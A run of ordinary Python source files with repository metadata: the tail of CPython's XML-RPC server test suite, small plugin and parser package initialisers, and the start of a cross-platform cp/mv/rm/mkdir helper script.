requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
class MyRequestHandler(requestHandler):
rpc_paths = []
serv = MyXMLRPCServer(("localhost", 0), MyRequestHandler,
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
try:
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
paths = ["/foo", "/foo/bar"]
for path in paths:
d = serv.add_dispatcher(path, SimpleXMLRPCServer.SimpleXMLRPCDispatcher())
d.register_introspection_functions()
d.register_multicall_functions()
serv.get_dispatcher(paths[0]).register_function(pow)
serv.get_dispatcher(paths[1]).register_function(lambda x,y: x+y, 'add')
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore socket.errors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
return False
@unittest.skipUnless(threading, 'Threading required for this test.')
class BaseServerTestCase(unittest.TestCase):
requestHandler = None
request_count = 1
threadFunc = staticmethod(http_server)
def setUp(self):
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, self.request_count, self.requestHandler)
threading.Thread(target=self.threadFunc, args=serv_args).start()
# wait for the server to be ready
self.evt.wait(10)
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait(10)
# disable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(BaseServerTestCase):
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_nonascii(self):
start_string = 'P\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}t'
end_string = 'h\N{LATIN SMALL LETTER O WITH HORN}n'
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
# [ch] The test 404 is causing lots of false alarms.
def XXXtest_404(self):
# send POST with httplib, it should return 404 header and
# 'Not Found' message.
conn = httplib.HTTPConnection(ADDR, PORT)
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
conn.close()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
try:
p = xmlrpclib.ServerProxy(URL)
meth = p.system.listMethods()
expected_methods = set(['pow', 'div', 'my_function', 'add',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall'])
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy(URL)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy(URL)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy(URL)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<type \'exceptions.Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
self.assertTrue(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
class MultiPathServerTestCase(BaseServerTestCase):
threadFunc = staticmethod(http_multi_server)
request_count = 2
def test_path1(self):
p = xmlrpclib.ServerProxy(URL+"/foo")
self.assertEqual(p.pow(6,8), 6**8)
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
def test_path2(self):
p = xmlrpclib.ServerProxy(URL+"/foo/bar")
self.assertEqual(p.add(6,8), 6+8)
self.assertRaises(xmlrpclib.Fault, p.pow, 6, 8)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class BaseKeepaliveServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
myRequests = []
def handle(self):
self.myRequests.append([])
self.reqidx = len(self.myRequests)-1
return self.parentClass.handle(self)
def handle_one_request(self):
result = self.parentClass.handle_one_request(self)
self.myRequests[self.reqidx].append(self.raw_requestline)
return result
requestHandler = RequestHandler
def setUp(self):
#clear request log
self.RequestHandler.myRequests = []
return BaseServerTestCase.setUp(self)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class KeepaliveServerTestCase1(BaseKeepaliveServerTestCase):
def test_two(self):
p = xmlrpclib.ServerProxy(URL)
#do three requests.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
#they should have all been handled by a single request handler
self.assertEqual(len(self.RequestHandler.myRequests), 1)
#check that we did at least two (the third may be pending append
#due to thread scheduling)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
#test special attribute access on the serverproxy, through the __call__
#function.
class KeepaliveServerTestCase2(BaseKeepaliveServerTestCase):
#ask for two keepalive requests to be handled.
request_count=2
def test_close(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")() #this should trigger a new keep-alive request
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
#they should have all been two request handlers, each having logged at least
#two complete requests
self.assertEqual(len(self.RequestHandler.myRequests), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-2]), 2)
def test_transport(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
p("transport").close() #same as above, really.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(len(self.RequestHandler.myRequests), 2)
#A test case that verifies that gzip encoding works in both directions
#(for a request and the response)
class GzipServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
def do_POST(self):
#store content of last request in class
self.__class__.content_length = int(self.headers["content-length"])
return self.parentClass.do_POST(self)
requestHandler = RequestHandler
class Transport(xmlrpclib.Transport):
#custom transport, stores the response length for our perusal
fake_gzip = False
def parse_response(self, response):
self.response_length=int(response.getheader("content-length", 0))
return xmlrpclib.Transport.parse_response(self, response)
def send_content(self, connection, body):
if self.fake_gzip:
#add a lone gzip header to induce decode error remotely
connection.putheader("Content-Encoding", "gzip")
return xmlrpclib.Transport.send_content(self, connection, body)
def setUp(self):
BaseServerTestCase.setUp(self)
def test_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
p = xmlrpclib.ServerProxy(URL, transport=t)
self.assertEqual(p.pow(6,8), 6**8)
a = self.RequestHandler.content_length
t.encode_threshold = 0 #turn on request encoding
self.assertEqual(p.pow(6,8), 6**8)
b = self.RequestHandler.content_length
self.assertTrue(a>b)
def test_bad_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
t.fake_gzip = True
p = xmlrpclib.ServerProxy(URL, transport=t)
cm = self.assertRaisesRegexp(xmlrpclib.ProtocolError,
re.compile(r"\b400\b"))
with cm:
p.pow(6, 8)
def test_gsip_response(self):
t = self.Transport()
p = xmlrpclib.ServerProxy(URL, transport=t)
old = self.requestHandler.encode_threshold
self.requestHandler.encode_threshold = None #no encoding
self.assertEqual(p.pow(6,8), 6**8)
a = t.response_length
self.requestHandler.encode_threshold = 0 #always encode
self.assertEqual(p.pow(6,8), 6**8)
b = t.response_length
self.requestHandler.encode_threshold = old
self.assertTrue(a>b)
#Test special attributes of the ServerProxy object
class ServerProxyTestCase(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
if threading:
self.url = URL
else:
# Without threading, http_server() and http_multi_server() will not
# be executed and URL is still equal to None. 'http://' is a just
# enough to choose the scheme (HTTP)
self.url = 'http://'
def test_close(self):
p = xmlrpclib.ServerProxy(self.url)
self.assertEqual(p('close')(), None)
def test_transport(self):
t = xmlrpclib.Transport()
p = xmlrpclib.ServerProxy(self.url, transport=t)
self.assertEqual(p('transport'), t)
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
def __getitem__(self, key):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return mimetools.Message.__getitem__(self, key)
@unittest.skipUnless(threading, 'Threading required for this test.')
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message
def test_basic(self):
# check that flag is false by default
flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("x-exception"), expected_err)
self.assertTrue(e.headers.get("x-traceback") is not None)
else:
self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
with test_support.EnvironmentVarGuard() as env:
env['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
with test_support.captured_stdout() as data_out:
self.cgi.handle_request()
# parse Status header
data_out.seek(0)
handle = data_out.read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
with test_support.EnvironmentVarGuard() as env, \
test_support.captured_stdout() as data_out, \
test_support.captured_stdin() as data_in:
data_in.write(data)
data_in.seek(0)
env['CONTENT_LENGTH'] = str(len(data))
self.cgi.handle_request()
data_out.seek(0)
# will respond exception, if so, our goal is achieved ;)
handle = data_out.read()
# start with 44th char so as not to get http header, we just need only xml
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
# Also test the content-length returned by handle_request
# Using the same test method inorder to avoid all the datapassing
# boilerplate code.
# Test for bug: http://bugs.python.org/issue5040
content = handle[handle.find("<?xml"):]
self.assertEquals(
int(re.search('Content-Length: (\d+)', handle).group(1)),
len(content))
class FakeSocket:
def __init__(self):
self.data = StringIO.StringIO()
def send(self, buf):
self.data.write(buf)
return len(buf)
def sendall(self, buf):
self.data.write(buf)
def getvalue(self):
return self.data.getvalue()
def makefile(self, x='r', y=-1):
raise RuntimeError
def close(self):
pass
class FakeTransport(xmlrpclib.Transport):
"""A Transport instance that records instead of sending a request.
This class replaces the actual socket used by httplib with a
FakeSocket object that records the request. It doesn't provide a
response.
"""
def make_connection(self, host):
conn = xmlrpclib.Transport.make_connection(self, host)
conn.sock = self.fake_socket = FakeSocket()
return conn
class TransportSubclassTestCase(unittest.TestCase):
def issue_request(self, transport_class):
"""Return an HTTP request made via transport_class."""
transport = transport_class()
proxy = xmlrpclib.ServerProxy("http://example.com/",
transport=transport)
try:
proxy.pow(6, 8)
except RuntimeError:
return transport.fake_socket.getvalue()
return None
def test_custom_user_agent(self):
class TestTransport(FakeTransport):
def send_user_agent(self, conn):
xmlrpclib.Transport.send_user_agent(self, conn)
conn.putheader("X-Test", "test_custom_user_agent")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_custom_user_agent\r\n", req)
def test_send_host(self):
class TestTransport(FakeTransport):
def send_host(self, conn, host):
xmlrpclib.Transport.send_host(self, conn, host)
conn.putheader("X-Test", "test_send_host")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_host\r\n", req)
def test_send_request(self):
class TestTransport(FakeTransport):
def send_request(self, conn, url, body):
xmlrpclib.Transport.send_request(self, conn, url, body)
conn.putheader("X-Test", "test_send_request")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_request\r\n", req)
def test_send_content(self):
class TestTransport(FakeTransport):
def send_content(self, conn, body):
conn.putheader("X-Test", "test_send_content")
xmlrpclib.Transport.send_content(self, conn, body)
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_content\r\n", req)
@test_support.reap_threads
def test_main():
xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase, TransportSubclassTestCase]
xmlrpc_tests.append(SimpleServerTestCase)
xmlrpc_tests.append(KeepaliveServerTestCase1)
xmlrpc_tests.append(KeepaliveServerTestCase2)
try:
import gzip
xmlrpc_tests.append(GzipServerTestCase)
except ImportError:
pass #gzip not supported in this build
xmlrpc_tests.append(MultiPathServerTestCase)
xmlrpc_tests.append(ServerProxyTestCase)
xmlrpc_tests.append(FailingServerTestCase)
xmlrpc_tests.append(CGIHandlerTestCase)
test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
test_main()
|
{
"content_hash": "9ec9d573113cab9f7b7cd1372eca3862",
"timestamp": "",
"source": "github",
"line_count": 1018,
"max_line_length": 88,
"avg_line_length": 37.97151277013752,
"alnum_prop": 0.6133747251325831,
"repo_name": "fkolacek/FIT-VUT",
"id": "2a3b2d97a5b0866ec0a8040b94bf709f1fadae75",
"size": "38655",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bp-revok/python/lib/python2.7/test/test_xmlrpc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "455326"
},
{
"name": "Awk",
"bytes": "8724"
},
{
"name": "Batchfile",
"bytes": "201"
},
{
"name": "Brainfuck",
"bytes": "83"
},
{
"name": "C",
"bytes": "5006938"
},
{
"name": "C++",
"bytes": "1835332"
},
{
"name": "CSS",
"bytes": "301045"
},
{
"name": "CoffeeScript",
"bytes": "46327"
},
{
"name": "Groff",
"bytes": "46766"
},
{
"name": "HTML",
"bytes": "937735"
},
{
"name": "Java",
"bytes": "552132"
},
{
"name": "JavaScript",
"bytes": "1742225"
},
{
"name": "Lua",
"bytes": "39700"
},
{
"name": "Makefile",
"bytes": "381793"
},
{
"name": "Objective-C",
"bytes": "4618"
},
{
"name": "PHP",
"bytes": "108701"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Perl",
"bytes": "60353"
},
{
"name": "Python",
"bytes": "22084026"
},
{
"name": "QMake",
"bytes": "2660"
},
{
"name": "R",
"bytes": "1370"
},
{
"name": "Ragel in Ruby Host",
"bytes": "17993"
},
{
"name": "Ruby",
"bytes": "21607145"
},
{
"name": "Shell",
"bytes": "611321"
},
{
"name": "Tcl",
"bytes": "4920"
},
{
"name": "TeX",
"bytes": "561423"
},
{
"name": "VHDL",
"bytes": "49180"
},
{
"name": "Visual Basic",
"bytes": "481"
},
{
"name": "XSLT",
"bytes": "154638"
},
{
"name": "Yacc",
"bytes": "32788"
}
],
"symlink_target": ""
}
|
"""Adds models and methods to handle multiple phone numbers, email
addresses etc ("contact details") per partner. See
:doc:`/specs/phones`.
.. autosummary::
:toctree:
fixtures.demo2
"""
from lino.api import ad, _
class Plugin(ad.Plugin):
verbose_name = _("Contact Details")
partner_model = 'contacts.Partner'
def on_site_startup(self, site):
super(Plugin, self).on_site_startup(site)
if self.partner_model is None:
return
self.partner_model = site.models.resolve(self.partner_model)
from lino.mixins import Phonable
if not issubclass(self.partner_model, Phonable):
raise Exception("partner_model {} is not a Phonable".format(
self.partner_model))
def setup_explorer_menu(self, site, user_type, m):
# mg = self.get_menu_group()
mg = site.plugins.contacts
m = m.add_menu(mg.app_label, mg.verbose_name)
m.add_action('phones.ContactDetailTypes')
m.add_action('phones.ContactDetails')
|
{
"content_hash": "c305963b64f32fa49716955fad0f734d",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 72,
"avg_line_length": 29.13888888888889,
"alnum_prop": 0.6320305052430887,
"repo_name": "lino-framework/xl",
"id": "17471fadeedcaf6e8b3182d0e0858a4b796df37f",
"size": "1163",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lino_xl/lib/phones/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "186625"
},
{
"name": "HTML",
"bytes": "1417287"
},
{
"name": "JavaScript",
"bytes": "1630929"
},
{
"name": "PHP",
"bytes": "40437"
},
{
"name": "Python",
"bytes": "2395471"
}
],
"symlink_target": ""
}
|
import abc
class ParseException(RuntimeError):
pass
class BaseParser(abc.ABC):
@abc.abstractmethod
def parse(self, content):
raise NotImplementedError()
from .html import HTMLParser
from .markdown import MarkdownParser
|
{
"content_hash": "8aa52453fc7b4dd10ed25ee3f61f4b42",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 36,
"avg_line_length": 16.333333333333332,
"alnum_prop": 0.7387755102040816,
"repo_name": "orf/wordinserter",
"id": "321d6a77a89a4b557fa0cf1cd292ad292327b94d",
"size": "245",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wordinserter/parsers/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "14887"
},
{
"name": "Python",
"bytes": "79383"
}
],
"symlink_target": ""
}
|
import fnmatch
import glob
import optparse
import os
import posixpath
import shutil
import stat
import sys
import time
import zipfile
if sys.version_info < (2, 6, 0):
sys.stderr.write("python 2.6 or later is required run this script\n")
sys.exit(1)
def IncludeFiles(filters, files):
"""Filter files based on inclusion lists
Return a list of files which match and of the Unix shell-style wildcards
provided, or return all the files if no filter is provided."""
if not filters:
return files
match = set()
for file_filter in filters:
match |= set(fnmatch.filter(files, file_filter))
return [name for name in files if name in match]
def ExcludeFiles(filters, files):
"""Filter files based on exclusions lists
Return a list of files which do not match any of the Unix shell-style
wildcards provided, or return all the files if no filter is provided."""
if not filters:
return files
match = set()
for file_filter in filters:
excludes = set(fnmatch.filter(files, file_filter))
match |= excludes
return [name for name in files if name not in match]
def CopyPath(options, src, dst):
"""CopyPath from src to dst
Copy a fully specified src to a fully specified dst. If src and dst are
both files, the dst file is removed first to prevent error. If and include
or exclude list are provided, the destination is first matched against that
filter."""
if options.includes:
if not IncludeFiles(options.includes, [src]):
return
if options.excludes:
if not ExcludeFiles(options.excludes, [src]):
return
if options.verbose:
print 'cp %s %s' % (src, dst)
# If the source is a single file, copy it individually
if os.path.isfile(src):
# We can not copy over a directory with a file.
if os.path.exists(dst):
if not os.path.isfile(dst):
msg = "cp: cannot overwrite non-file '%s' with file." % dst
raise OSError(msg)
# If the destination exists as a file, remove it before copying to avoid
# 'readonly' issues.
os.remove(dst)
# Now copy to the non-existent fully qualified target
shutil.copy(src, dst)
return
# Otherwise it's a directory, ignore it unless allowed
if os.path.isdir(src):
if not options.recursive:
print "cp: omitting directory '%s'" % src
return
# We can not copy over a file with a directory.
if os.path.exists(dst):
if not os.path.isdir(dst):
msg = "cp: cannot overwrite non-directory '%s' with directory." % dst
raise OSError(msg)
else:
# if it didn't exist, create the directory
os.makedirs(dst)
# Now copy all members
for filename in os.listdir(src):
srcfile = os.path.join(src, filename)
dstfile = os.path.join(dst, filename)
CopyPath(options, srcfile, dstfile)
return
def Copy(args):
"""A Unix cp style copy.
Copies multiple sources to a single destination using the normal cp
semantics. In addition, it support inclusion and exclusion filters which
allows the copy to skip certain types of files."""
parser = optparse.OptionParser(usage='usage: cp [Options] sources... dest')
parser.add_option(
'-R', '-r', '--recursive', dest='recursive', action='store_true',
default=False,
help='copy directories recursively.')
parser.add_option(
'-v', '--verbose', dest='verbose', action='store_true',
default=False,
help='verbose output.')
parser.add_option(
'--include', dest='includes', action='append', default=[],
help='include files matching this expression.')
parser.add_option(
'--exclude', dest='excludes', action='append', default=[],
help='exclude files matching this expression.')
options, files = parser.parse_args(args)
if len(files) < 2:
parser.error('ERROR: expecting SOURCE(s) and DEST.')
srcs = files[:-1]
dst = files[-1]
src_list = []
for src in srcs:
files = glob.glob(src)
if not files:
raise OSError('cp: no such file or directory: ' + src)
if files:
src_list.extend(files)
for src in src_list:
# If the destination is a directory, then append the basename of the src
# to the destination.
if os.path.isdir(dst):
CopyPath(options, src, os.path.join(dst, os.path.basename(src)))
else:
CopyPath(options, src, dst)
def Mkdir(args):
"""A Unix style mkdir"""
parser = optparse.OptionParser(usage='usage: mkdir [Options] DIRECTORY...')
parser.add_option(
'-p', '--parents', dest='parents', action='store_true',
default=False,
help='ignore existing parents, create parents as needed.')
parser.add_option(
'-v', '--verbose', dest='verbose', action='store_true',
default=False,
help='verbose output.')
options, dsts = parser.parse_args(args)
if len(dsts) < 1:
parser.error('ERROR: expecting DIRECTORY...')
for dst in dsts:
if options.verbose:
print 'mkdir ' + dst
try:
os.makedirs(dst)
except OSError:
if os.path.isdir(dst):
if options.parents:
continue
raise OSError('mkdir: Already exists: ' + dst)
else:
raise OSError('mkdir: Failed to create: ' + dst)
return 0
def MovePath(options, src, dst):
"""MovePath from src to dst
Moves the src to the dst much like the Unix style mv command, except it
only handles one source at a time. Because of possible temporary failures
do to locks (such as anti-virus software on Windows), the function will retry
up to five times."""
# if the destination is not an existing directory, then overwrite it
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
# If the destination exists, the remove it
if os.path.exists(dst):
if options.force:
Remove(['-vfr', dst])
if os.path.exists(dst):
raise OSError('mv: FAILED TO REMOVE ' + dst)
else:
raise OSError('mv: already exists ' + dst)
for _ in range(5):
try:
os.rename(src, dst)
return
except OSError as error:
print 'Failed on %s with %s, retrying' % (src, error)
time.sleep(5)
print 'Gave up.'
raise OSError('mv: ' + error)
def Move(args):
parser = optparse.OptionParser(usage='usage: mv [Options] sources... dest')
parser.add_option(
'-v', '--verbose', dest='verbose', action='store_true',
default=False,
help='verbose output.')
parser.add_option(
'-f', '--force', dest='force', action='store_true',
default=False,
help='force, do not error it files already exist.')
options, files = parser.parse_args(args)
if len(files) < 2:
parser.error('ERROR: expecting SOURCE... and DEST.')
srcs = files[:-1]
dst = files[-1]
if options.verbose:
print 'mv %s %s' % (' '.join(srcs), dst)
for src in srcs:
MovePath(options, src, dst)
return 0
def Remove(args):
"""A Unix style rm.
Removes the list of paths. Because of possible temporary failures do to locks
(such as anti-virus software on Windows), the function will retry up to five
times."""
parser = optparse.OptionParser(usage='usage: rm [Options] PATHS...')
parser.add_option(
'-R', '-r', '--recursive', dest='recursive', action='store_true',
default=False,
help='remove directories recursively.')
parser.add_option(
'-v', '--verbose', dest='verbose', action='store_true',
default=False,
help='verbose output.')
parser.add_option(
'-f', '--force', dest='force', action='store_true',
default=False,
help='force, do not error it files does not exist.')
options, files = parser.parse_args(args)
if len(files) < 1:
parser.error('ERROR: expecting FILE...')
try:
for pattern in files:
dst_files = glob.glob(pattern)
if not dst_files:
# Ignore non existing files when using force
if options.force:
continue
raise OSError('rm: no such file or directory: ' + pattern)
for dst in dst_files:
if options.verbose:
print 'rm ' + dst
if os.path.isfile(dst) or os.path.islink(dst):
for i in range(5):
try:
# Check every time, since it may have been deleted after the
# previous failed attempt.
if os.path.isfile(dst) or os.path.islink(dst):
os.remove(dst)
break
except OSError as error:
if i == 5:
print 'Gave up.'
raise OSError('rm: ' + str(error))
print 'Failed remove with %s, retrying' % error
time.sleep(5)
if options.recursive:
for i in range(5):
try:
if os.path.isdir(dst):
shutil.rmtree(dst)
break
except OSError as error:
if i == 5:
print 'Gave up.'
raise OSError('rm: ' + str(error))
print 'Failed rmtree with %s, retrying' % error
time.sleep(5)
except OSError as error:
print error
return 0
def MakeZipPath(os_path, isdir, iswindows):
"""Changes a path into zipfile format.
# doctest doesn't seem to honor r'' strings, so the backslashes need to be
# escaped.
>>> MakeZipPath(r'C:\\users\\foobar\\blah', False, True)
'users/foobar/blah'
>>> MakeZipPath('/tmp/tmpfoobar/something', False, False)
